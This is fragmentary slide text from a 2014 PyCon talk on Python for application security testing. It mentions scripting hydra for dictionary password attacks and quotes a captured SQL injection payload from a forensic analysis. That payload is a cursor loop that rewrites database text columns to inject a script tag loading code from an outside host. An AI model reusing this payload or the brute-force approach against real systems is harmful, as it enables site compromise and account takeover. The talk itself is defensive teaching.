Security is only as strong as the weakest link And the most frequent weakest link is password Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 23 / 41
to login using words in the dictionary python script to execute hydra for multiple dictionary files (wordlists) Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 25 / 41
attacked by SQL injection Starting the forensic by capturing all network traffic Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 33 / 41
: /transfertoasp.aspx Value : id=143) declar @s varchar(4000) i set @s=cast(0x20736557420616e7369.... Frame : 52653 Reason : Possible use of SQL syntax in variable Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 36 / 41
VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in (\’nvarchar\’, \’varchar\’, \’ntext\’, \’text\’,and c.CHARACTER_MAXIMUM_LENGHT>30 and t.table_name=c.table_name and t.table_type=\’BASE TABLE\’ OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(\’UPDATE [\’[email protected]+\’] SET [\’[email protected]+\’]=\’\’"> </title><script src="http://enswdzq112aazz.com/s1.php"> Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 39 / 41